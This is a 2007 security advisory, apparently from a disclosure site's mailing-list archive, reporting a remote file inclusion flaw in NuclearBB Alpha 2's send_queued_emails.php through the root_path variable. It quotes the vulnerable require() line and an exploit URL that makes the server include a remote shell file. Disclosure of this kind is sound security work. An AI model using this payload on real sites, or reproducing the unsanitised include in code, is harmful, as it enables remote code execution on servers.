Computer Security

Security Advisory: NuclearBB Alpha 2 Remote File Inclusion
back  news / advisories / forum / software / advertising / search / exploits  forward
[EN] securityvulns.ru
no-pyccku



Related information

  Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

  [Aria-Security Team] social-networkin SQL Injection

  Husrev Forums v2.0.1:PoWerBoard Sql

  Proxy Anket v3.0.1 Sql injection Vulnerable

  phpMyQuote 0.20 Version Multiple Sql And Xss Vulnerabilities

From:b14ck1c3_(at)_hotmail.com <b14ck1c3_(at)_hotmail.com>
Date:11.09.2007
Subject:NuclearBB Alpha 2 Remote File Inclusion

Vuln Product: NuclearBB Alpha 2
Vendor: http://www.nuclearbb.com/
Vulnerability Type: Remote File Inclusion
Autor: Infection
Team: Rootshell Security Team
Vulnerable file: /NuclearBB/tasks/send_queued_emails.php
Exploit URL: http://localhost/NuclearBB/tasks/send_queued_emails.php?root_path=http:
//localhost/shell.txt?
Method: get
Register_globals: On
Vulnerable variable: root_path
Line number: 14
Lines:

----------------------------------------------

require("$root_path/inc/functions_email.php");
$mail = new email;

----------------------------------------------
About | Terms of use | Privacy Policy
© SecurityVulns, 3APA3A, Vladimir Dubrovin
 


Рейтинг@Mail.ru